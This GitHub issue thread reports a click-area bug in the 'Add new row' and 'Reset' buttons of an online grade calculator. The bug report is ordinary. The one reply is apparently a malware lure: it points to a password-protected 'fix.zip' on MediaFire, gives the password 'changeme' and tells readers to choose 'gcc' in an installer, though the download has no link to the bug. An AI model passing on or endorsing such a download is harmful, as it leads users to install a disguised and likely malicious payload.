### ISSUE TITLE
"+ Add new row" and "Reset" button issue for mentioned calculators

### ISSUE THREAD

**Issue by Farhannafiz** [softeko/grade-calculator#355]
**Describe the bug**
"+ Add new row" and "Reset" button working on other location than the button. Watch video to under stand. Calculators: Overall Midterm Grade Calculator- Add new row, Final Grade Calculator (from multiple current grades) - Add & Reset, School Grade Calculator - Reset button.

**To Reproduce**
1. Go to 'onlinegradecalculator.io'
2. Click on 'mentioned calculators'
3. Try to hover on the buttons opposite side. Side ways.

**Expected behavior**
Clicking on except the button won't trigger.

**Screenshots**

https://github.com/user-attachments/assets/fe02d0c7-8458-4327-a9a8-e4b6b6c56e4f

**Desktop :**
 - OS: [Windows 11]
 - Browser [chrome]
 - Version [128.0.6613.85]

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
